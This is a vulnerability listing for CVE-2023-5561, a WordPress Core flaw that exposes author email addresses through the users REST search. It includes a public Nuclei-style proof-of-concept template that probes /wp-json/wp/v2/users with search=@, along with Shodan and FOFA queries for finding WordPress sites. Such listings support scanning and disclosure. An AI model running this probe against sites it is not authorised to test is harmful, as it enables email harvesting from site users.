CVE-2023-5561: WordPress Core - Post Author Email Disclosure

日期: 2025-08-01 | 影响软件: WordPress Core | POC: 已公开

漏洞描述

WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.

PoC代码[已公开]

id: CVE-2023-5561

info:
  name: WordPress Core - Post Author Email Disclosure
  author: nqdung2002
  severity: medium
  description: |
    WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.
  impact: |
    This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress
    - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5561
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-5561
    cwe-id: CWE-200
    epss-score: 0.58339
    epss-percentile: 0.98139
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordpress
    product: wordpress
    framework: wordpress
    shodan-query:
      - cpe:"cpe:2.3:a:wordpress:wordpress"
      - http.component:"wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{route}}search=@"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/users?"
        - "?rest_route=/wp/v2/users&"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "[{\"id", "name\":")'
        condition: and
# digest: 4a0a004730450220221da197d9825e462bed402e90209e19cac2e7185628bb08282f1043a40f4767022100f19f4b3a3bacf98f0470fb9a68cb39d3017a4f9fe4fb06eb58d911d25cc76207:922c64590222798bb761d5b6d8e72950

相关漏洞推荐